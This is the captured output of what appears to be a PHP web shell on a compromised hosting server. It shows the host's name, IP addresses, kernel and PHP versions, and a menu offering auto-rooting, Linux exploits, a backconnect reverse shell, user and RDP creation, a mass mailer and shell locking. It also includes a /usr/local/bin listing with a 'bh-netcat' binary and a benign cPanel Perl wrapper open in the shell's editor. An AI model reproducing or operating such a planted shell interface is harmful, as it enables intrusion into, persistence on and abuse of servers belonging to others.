Linux 120.141.167.72.host.secureserver.net 4.18.0-553.150.1.el8_10.x86_64 #1 SMP Fri Jul 31 15:23:31 EDT 2026 x86_64
Apache
: 72.167.141.120 | : 216.73.217.14
808 Domain
7.4.33
bestseocompany
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
local /
bin /
[ HOME SHELL ]
Name
Size
Permission
Action
bh-netcat
694
B
-rwxr-xr-x
cpan
8.06
KB
-r-xr-xr-x
cpan-mirrors
4.19
KB
-r-xr-xr-x
crontab
3.07
MB
-rwxr-xr-x
ea-php72
5.55
MB
-rwxr-xr-x
ea-php73
5.39
MB
-rwxr-xr-x
ea-php74
6.09
MB
-rwxr-xr-x
ea-php80
7.62
MB
-rwxr-xr-x
ea-php81
7.72
MB
-rwxr-xr-x
ea-php83
7.8
MB
-rwxr-xr-x
ea_convert_php_ini
39.85
KB
-rwxr-xr-x
ea_current_to_profile
11.25
KB
-rwxr-xr-x
ea_install_profile
7.1
KB
-rwxr-xr-x
ea_sync_user_phpini_settings
6.73
KB
-rwxr-xr-x
httpx
51.92
MB
-rwxr-xr-x
json_xs
6.85
KB
-r-xr-xr-x
lsphp
937
B
-rwxr-xr-x
passwd
3.58
MB
-rwxr-xr-x
pear
935
B
-rwxr-xr-x
php
933
B
-rwxr-xr-x
pip
227
B
-rwxr-xr-x
pip3
227
B
-rwxr-xr-x
pip3.6
227
B
-rwxr-xr-x
wheel
214
B
-rwxr-xr-x
wp
181
B
-rwxr-xr-x
wp-toolkit
167
B
-rwx------
Delete
Unzip
Zip
${this.title}
Close
Code Editor : php
#!/usr/local/cpanel/3rdparty/bin/perl # cpanel - php-cli Copyright 2018 cPanel, L.L.C. # All rights Reserved. # copyright@cpanel.net http://cpanel.net # This code is subject to the cPanel license. Unauthorized copying is prohibited package ea_php_cli::cli; BEGIN { delete @ENV{qw(PERL5LIB PERLLIB PERL5OPT PERL5DB PERL5SHELL PERL_DEBUG_MSTATS PERL_DESTRUCT_LEVEL)}; # Paranoid much? unshift @INC, '/var/cpanel/ea4'; # avoid slow use lib } use strict; use warnings; use ea_php_cli (); my $bin = "php"; run(@ARGV) unless caller(); sub run { return ea_php_cli::run( $bin, @_ ); # faster than unshift @_, "php-cgi"; goto &ea_php_cli::run; ? } 1;
Close